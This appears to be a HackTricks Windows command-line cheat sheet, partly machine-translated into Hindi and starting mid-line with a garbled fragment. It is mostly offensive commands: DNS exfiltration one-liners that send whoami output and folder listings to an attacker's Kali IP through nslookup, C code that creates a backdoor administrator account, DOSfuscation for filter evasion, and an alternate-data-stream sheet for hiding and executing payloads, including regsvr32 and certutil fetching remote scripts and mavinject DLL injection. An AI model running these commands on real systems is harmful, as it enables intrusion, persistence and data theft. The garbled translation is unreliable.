net localgroup "Remote Desktop Users" username /add: रिमोट डेस्कटॉप उपयोगकर्ता समूह में एक उपयोगकर्ता जोड़ता है।
-
net localgroup "Remote Desktop Users" username /delete: Removes a user from the Remote Desktop Users group.
-
net localgroup "Remote Desktop Users" username /delete: रिमोट डेस्कटॉप उपयोगकर्ता समूह से एक उपयोगकर्ता हटाता है।
-
net localgroup "Remote Desktop Users" domain\username /add: Adds a domain user to the Remote Desktop Users group.
-
net localgroup "Remote Desktop Users" domain\username /add: रिमोट डेस्कटॉप उपयोगकर्ता समूह में एक डोमेन उपयोगकर्ता जोड़ता है।
-
net localgroup "Remote Desktop Users" domain\username /delete: Removes a domain user from the Remote Desktop Users group.
-
net localgroup "Remote Desktop Users" domain\username /delete: रिमोट डेस
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
# Get error messages from code
net helpmsg 32 #32 is the code in that case
चार ब्लैकलिस्टिंग को अनदेखा करें
चार ब्लैकलिस्टिंग को अनदेखा करने के लिए तकनीक का उपयोग करें।
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
DOSfuscation
CMD लाइन को गोपनीयता बनाए रखने के लिए एक अस्पष्टिकरणित CMD लाइन उत्पन्न करता है।
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
सुनें पता ACLs
आप व्यवस्थापक के बिना http://+:80/Temporary_Listen_Addresses/ पर सुन सकते हैं।
netsh http show urlacl
मैनुअल DNS शैल
हमलावर (काली) को इन दो विकल्पों में से एक का उपयोग करना होगा:
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
पीड़ित
for /f tokens _**_तकनीक: यह हमें कमांड चलाने, प्रत्येक पंक्ति के पहले X शब्द प्राप्त करने और इसे DNS के माध्यम से हमारे सर्वर पर भेजने की अनुमति देता है
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
आप आउटपुट को भी रीडायरेक्ट कर सकते हैं, और फिर उसे पढ़ सकते हैं।
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
C कोड से CMD को बुलाना
To call CMD (Command Prompt) from C code, you can use the system()
function. This function allows you to execute a command in the command prompt.
#include <stdlib.h>
int main() {
system("command");
return 0;
}
In the above code, replace "command"
with the command you want to execute in CMD. For example, if you want to execute the ipconfig
command, the code would be:
#include <stdlib.h>
int main() {
system("ipconfig");
return 0;
}
This will open the command prompt and execute the ipconfig
command. You can replace it with any other command you want to execute.
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}
वैकल्पिक डेटा स्ट्रीम्स चीटशीट (ADS/वैकल्पिक डेटा स्ट्रीम)
https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f से लिया गया
##Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
set-content - path {path to the file} - stream {name of the stream}
## Discover ADS contecnt
dir /R
streams.exe <c:\path\to\file> #Binary from sysinternals#
Get-Item -Path .\fie.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
##Extract content from ADS###
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
more < c:\ads\file.txt:test.exe
##Executing the ADS content###
* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
* Rundll32
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
* Cscript
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
* Wscript
wscript c:\ads\file.txt:script.vbs
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
* Forfiles
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
* Mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
notepad.exe 4172 31C5CE94259D4006 2 18,476 K
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
* MSHTA
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
(Does not work on Windows 10 1903 and newer)
* Control.exe
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209
* Create service and run
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* Powershell.exe
powershell -ep bypass - < c:\temp:ttt
* Powershell.exe
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
* Regedit.exe
regedit c:\ads\file.txt:regfile.reg
* Bitsadmin.exe
bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile
* AppVLP.exe
AppVLP.exe c:\windows\tracing\test.txt:ha.exe
* Cmd.exe
cmd.exe - < fakefile.doc:reg32.bat
https://twitter.com/yeyint_mth/status/1143824979139579904
* Ftp.exe
ftp -s:fakefile.txt:aaaa.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* ieframe.dll , shdocvw.dll (ads)
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* bash.exe
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
bash.exe -c $(fakefile.txt:payload.sh)
https://github.com/sailay1996/misc-bin/blob/master/ads.md
* Regsvr32
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को हैकट्रिक्स में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने की इच्छा है? सदस्यता योजनाएं की जांच करें!
- The PEASS Family की खोज करें, हमारा विशेष NFT संग्रह
- आधिकारिक PEASS और HackTricks swag प्राप्त करें
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह में या मुझे Twitter पर फ़ॉलो करें 🐦@carlospolopm.
- अपने हैकिंग ट्रिक्स को hacktricks रेपो और hacktricks-cloud रेपो में पीआर जमा करके अपना योगदान दें।